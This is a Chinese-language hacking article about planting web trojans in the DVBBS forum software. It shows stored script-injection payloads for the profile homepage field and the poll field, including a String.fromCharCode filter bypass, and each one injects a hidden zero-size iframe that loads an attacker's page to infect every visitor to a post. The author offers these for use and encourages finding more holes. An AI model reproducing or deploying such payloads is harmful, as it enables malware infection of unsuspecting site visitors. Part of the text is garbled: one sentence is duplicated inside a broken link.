作者：優(yōu)格GXU 文章來(lái)源：邪惡八進(jìn)制信息安全團(tuán)隊(duì)  

文章作者：優(yōu)格[GXU] （www.wuzhou.org）  
信息來(lái)源：邪惡八進(jìn)制信息安全團(tuán)隊(duì)（www.eviloctal.com）  
原文下載：http://www.wuzhou.org/dvbbs.doc  

前段時(shí)間focn等人發(fā)現(xiàn)了動(dòng)網(wǎng)的提權(quán)漏洞，這漏洞可是鬧得天翻地覆的，連當(dāng)當(dāng)網(wǎng)論壇也給掛上馬了。正是這個(gè)漏洞蓋住了動(dòng)網(wǎng)的其他漏洞，使動(dòng)網(wǎng)的其他漏洞少為人知。  
相信大家都看過(guò)《終結(jié)動(dòng)網(wǎng)最新掛馬方法！》的文章了，其實(shí)這個(gè)漏洞已經(jīng)出現(xiàn)了大概半月了，后來(lái)才被公布出來(lái)。利用方法就是在“修改個(gè)人聯(lián)系方法”中的“個(gè)人主頁(yè)”寫(xiě)入代碼：  
</Script><IfraMe height=0 width=0 src="http://www.wuzhou.org"></IfraMe>  
在MSN中寫(xiě)入代碼：  
<Script Language=JavaScript>var actioninfo3='單帖屏蔽'  
其中木馬。這樣，我們發(fā)貼或者回帖，只要有人訪問(wèn)這個(gè)帖子就會(huì)跳轉(zhuǎn)訪問(wèn)我們的木馬。其原理就是對(duì)原代碼進(jìn)行欺騙，今天主要說(shuō)的是動(dòng)網(wǎng)的另一個(gè)掛馬方法-----投票掛馬。通過(guò)測(cè)試，發(fā)現(xiàn)動(dòng)網(wǎng)的所有版本均存在這個(gè)漏洞。 href="http://www.wuzhou.org為你的網(wǎng)頁(yè)木馬。這樣，我們發(fā)貼或者回帖，只要有人訪問(wèn)這個(gè)帖子就會(huì)跳轉(zhuǎn)訪問(wèn)我們的木馬。其原理就是對(duì)原代碼進(jìn)行欺騙，今天主要說(shuō)的是動(dòng)網(wǎng)的另一個(gè)掛馬方法-----投票掛馬。通過(guò)測(cè)試，發(fā)現(xiàn)動(dòng)網(wǎng)的所有版本均存在這個(gè)漏洞。/" target=_blank>http://www.wuzhou.org為你的網(wǎng)頁(yè)木馬。這樣，我們發(fā)貼或者回帖，只要有人訪問(wèn)這個(gè)帖子就會(huì)跳轉(zhuǎn)訪問(wèn)我們的木馬。其原理就是對(duì)原代碼進(jìn)行欺騙，今天主要說(shuō)的是動(dòng)網(wǎng)的另一個(gè)掛馬方法-----投票掛馬。通過(guò)測(cè)試，發(fā)現(xiàn)動(dòng)網(wǎng)的所有版本均存在這個(gè)漏洞。  
首先，我們發(fā)表一個(gè)投票看看。如圖1  
我們看一下源文件：  
<Script Language=JavaScript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</Script>  
其中ssssssssss是我們自由寫(xiě)入的，那么我們能不能對(duì)源文件進(jìn)行欺騙，從而讓它運(yùn)行我們的代碼呢？打個(gè)比方，一個(gè)括號(hào)：（），當(dāng)我們?cè)冢ǎ﹥?nèi)寫(xiě)進(jìn)）和（，那就變成了兩個(gè)括號(hào)。道理是相同的，我們也可以這樣進(jìn)行代碼欺騙。我們?cè)诎l(fā)表投票中寫(xiě)入：  
';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='  

在這里順便說(shuō)一下，動(dòng)網(wǎng)的投票功能沒(méi)有進(jìn)行嚴(yán)密的過(guò)濾，當(dāng)寫(xiě)入的投票項(xiàng)目為網(wǎng)頁(yè)代碼時(shí)，代碼照樣可以執(zhí)行，而且寫(xiě)入的代碼并不按照它所說(shuō)的“每行一個(gè)投票項(xiàng)目，最多10個(gè)”，并沒(méi)有分行。發(fā)表投票后，查看源文件：  
<Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script>  
代碼是無(wú)法執(zhí)行的，動(dòng)網(wǎng)進(jìn)行了過(guò)濾。再次饒過(guò)思路，動(dòng)網(wǎng)只是對(duì)<和>進(jìn)行過(guò)濾，對(duì)+'/等符號(hào)沒(méi)有過(guò)濾。再次在投票那寫(xiě)入代碼：  
';document.all.popmenu.innerHTML=document.all.popmenu.innerHTML+String.fromCharCode(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=http://www.wuzhou.org width=0'+String.fromCharCode(62)+String.fromCharCode(60)+'/IFRAME'+String.fromCharCode(62);var vote='1  

發(fā)表后成功跳轉(zhuǎn)了www.wuzhou.org這個(gè)站。如果我們把站改成我們的網(wǎng)頁(yè)木馬，那么一個(gè)木馬貼就這樣完成了。其實(shí)這只是動(dòng)網(wǎng)代碼欺騙的一小部分，還有不少的地方可以進(jìn)行代碼欺騙，比如用戶(hù)頭像，聯(lián)系方法等。  

后記：現(xiàn)在很多的程序作者并沒(méi)有看到到代碼欺騙這安全危害，在我看的很多網(wǎng)站程序，不管是asp還是php的，都有許多程序可以進(jìn)行代碼欺騙，希望這篇文章能起到拋磚引玉的效果,讓各位朋友找到更多的漏洞。